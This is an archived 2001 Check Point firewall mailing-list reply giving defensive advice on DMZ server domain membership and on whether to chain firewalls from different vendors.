[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index] RE: [FW1] Best Practice?!
In reply to #2, I am assuming your theory is that if the first firewall is somehow compromised that having the 2nd one a different vendor/type would perhaps add a secondary layer of protection. If you have a lot of money to burn and are willing to incur significantly more administrative overhead and complexity, sounds like that might work. I think you might spend your time and money more wisely stengthening your single firewall and tightening your rulebase, along with good intrusion detection systems. If it were up to me, I would install two firewalls in parallel and use a foundry switch to load balance traffic from two routers taking full internet routes so you have good redudancy. In reply to #1, I would not have member servers in DMZ unless absolutely necessary. I guess it depends on your definition of "DMZ". If you mean a network segment that is completely exposed to internet without any rules etc, then I would suggest not running ANY servers there. Lots of these SOHO "firewalls" have no rule base and DMZ is just wide open. If DMZ means a network segment that has "some" access to the internet and rules defining service availability, then you might be able to run a bastion host that actually does NLTM authentication to your domain but you should be extremely carefull how this server is setup and be very carefull to ensure that if/when it gets compromised it is detected quickly and there should be a means to quickly restore it to it's proper state. This means running software like tripwire/intact, rembo, etc etc. If DMZ means a network segment that is secured but has no access to the internet and is only used for internal security purposes, then allowing it to be a member server is less of an issue. I don't know if I like the term DMZ. I prefer to call them "legs" and they may be seperate network segments/vlans with rules defining their allowed traffic, authentication etc. You might have 3 legs, 5 legs or more depending on what your situation is.. -----Original Message----- From: [email protected] [mailto:[email protected]]On Behalf Of Ivan Fox Sent: Saturday, January 13, 2001 2:29 PM To: fw-wiz; fw-1-mailinglist (e-mail) Subject: [FW1] Best Practice?! Are the following two items "best practices"? Your comments are appreciated. 1) All NT-based servers in a DMZ should be stand-alone servers, not member servers of a NT Domain? 2) If two firewalls in serial, they should be of different make, for instance, Check Point on NT and Check Point on Solaris or Check Point and PIX?! ================================================================================ To unsubscribe from this mailing list, please see the instructions at http://www.checkpoint.com/services/mailing.html ================================================================================ ================================================================================ To unsubscribe from this mailing list, please see the instructions at http://www.checkpoint.com/services/mailing.html ================================================================================
|